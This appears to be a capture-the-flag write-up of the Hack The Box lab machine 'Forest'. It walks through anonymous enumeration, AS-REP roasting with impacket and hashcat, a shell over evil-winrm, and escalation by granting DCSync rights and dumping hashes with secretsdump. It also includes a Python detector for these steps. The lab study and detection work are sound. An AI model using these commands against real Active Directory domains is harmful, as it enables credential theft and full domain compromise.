OSCP PREP BOX 10: HtB Forest
Alright, today we’re going to be taking on Forest. Forest is an Active Directory, easy machine.
As always, we’ll run our default nmap scan and see what we’re working with.
Definitely an AD machine given our output. I started this machine by poking at the DNS server to see if we could do some enumeration which didn’t give us much of anything to work with.
Moving down the list I tested our rpcclient to see if it leaked any info and it does!
rpcclient -U "" -N <IP>
I then ran enumdomusers and it gave us a list of domain users which we can fashion into a users.txt wordlist.
I got some additional enumeration but nothing too noteworthy. Now we move onto LDAP.
This was very successful for me since LDAP was misconfigured to allow anonymous bind! So, let’s start some enumeration with ldapsearch. You can dump ldap with: ldapsearch -x -H 'ldap://forest.htb' -s sub -b 'DC=HTB,DC=LOCAL'
This will show us groups, users, rights/permissions and more. But, since we have our users.txt file created from rpcclient, let’s use that to see if we can do any Kerberos attacks.
First let's use impacket to see if there are any ASREProastable accounts enabled. We're going to use GetNPUsers (more detail found here: https://www.thehacker.recipes/ad/movement/kerberos/asreproast).
impacket-GetNPUsers -usersfile users.txt -request -format hashcat -outputfile ASREProastable.txt -dc-ip 10.10.10.161 'HTB/'
So we run that and we get a user hash!
Now that we have that saved into a hash file, we can use that with hashcat to crack: hashcat -m 18200 -a 0 ASREProastable.txt /usr/share/wordlists/rockyou.txt
Now we have credentials! Let’s try and use crackmapexec to authenticate with smb: svc-alfresco:s3rvice.
I tried running spider_plus first, to check for readable files and there was nothing of note. Just some GPT.ini files in the SYSVOL folder. So nothing too good there.
I then went back to crackmap and was thinking that since this is a service account, it might be an admin of some service.. so I tried playing around with services for crackmapexec to see if I got Pwn3d! for anything (indicating it’s an admin account) and we do!
Now we can use evil-winrm and get a shell!
If we cd to our desktop, we’ll see we have our first user flag located on our desktop! Progress.
Now, it's always a good idea to test for password reuse with service accounts, admin accounts, etc. So I ran crackmapexec with our userlist.txt file, svc-alfresco's password and --continue-on-success, but I didn't get any other user accounts.
Now let’s get bloodhound going. From my linux terminal, I used bloodhound-python to extract our json files we’ll be using for our bloodhound gui. I ran: sudo bloodhound-python -u svc-alfresco -p s3rvice -ns 10.10.10.161 -d htb.local -c all.
Then I opened BloodHound and uploaded our json files. From here I went to Analysis -> Find As-REP Roastable Users -> Marked Svc-Alfresco as owned -> Shortest Path to Domain Admins from Owned Principals.
So from this, we have a few steps to get to Administrator. First we have to add ourselves to the Exchange Windows Permissions group, then use that group status to DCSync.
To start, we’ll run: net group "Exchange Windows Permissions" svc-alfresco /add /domain
Great, now all we have to do is grant ourselves DCSync privs and we’re in business.. almost..
I ran into a double hop problem in that trying to pass credentials to the second host wasn’t being recognized from the first host. So I ended up running: Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync
This passes our credentials all in one script.
From there, you can just run secretsdump.py on your local kali box and we get hashes!
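From the blue-team side, the whole chain above (AS-REP roast of svc-alfresco, the add to Exchange Windows Permissions, the DCSync) leaves a footprint in Windows Security events. This is an added example, not part of the original walkthrough: a small Python detector run over constructed event records (dicts standing in for parsed 4768/4756/4662 events; the IP and member DN are made up).

```python
import re

# Real directory-replication control-access GUIDs that DCSync needs (4662 Properties)
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
# Groups whose membership changes matter on this box (lower-cased for comparison)
WATCHED_GROUPS = {"exchange windows permissions", "domain admins"}

# Constructed sample events, in the order the attack chain happened (not real logs)
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc-alfresco", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"EventID": 4768, "TargetUserName": "sebastien", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.161"},
    {"EventID": 4756, "SubjectUserName": "svc-alfresco",
     "TargetUserName": "Exchange Windows Permissions",
     "MemberName": "CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local"},
    {"EventID": 4662, "SubjectUserName": "svc-alfresco",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def classify(event):
    """Return (signal, severity, principal) for a suspicious event, else None."""
    eid = event.get("EventID")
    # 4768 with PreAuthType 0 = TGT issued without pre-auth, i.e. an AS-REP roast
    # candidate; RC4 (0x17) is the hashcat -m 18200 case, so rank it higher.
    if eid == 4768 and event.get("PreAuthType") == "0":
        rc4 = event.get("TicketEncryptionType", "").lower() == "0x17"
        return ("asrep_roast_candidate", "high" if rc4 else "medium", event["TargetUserName"])
    # 4728 (global) / 4756 (universal): member added to a security-enabled group
    if eid in (4728, 4756) and event.get("TargetUserName", "").lower() in WATCHED_GROUPS:
        return ("privileged_group_add", "high", event["TargetUserName"])
    # 4662 carrying replication GUIDs from a non-machine account = DCSync.
    # Note: 4662 only fires if a SACL audits these operations on the domain object.
    if eid == 4662:
        guids = set(re.findall(r"[0-9a-f-]{36}", event.get("Properties", "").lower()))
        subject = event.get("SubjectUserName", "")
        if guids & REPL_GUIDS and not subject.endswith("$"):
            return ("dcsync_replication", "critical", subject)
    return None


def detect(events):
    return [hit for e in events if (hit := classify(e))]


if __name__ == "__main__":
    for signal, severity, who in detect(SAMPLE_EVENTS):
        print(f"[{severity}] {signal}: {who}")
```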
Now we can log in with evil-winrm by passing the hash of the admin: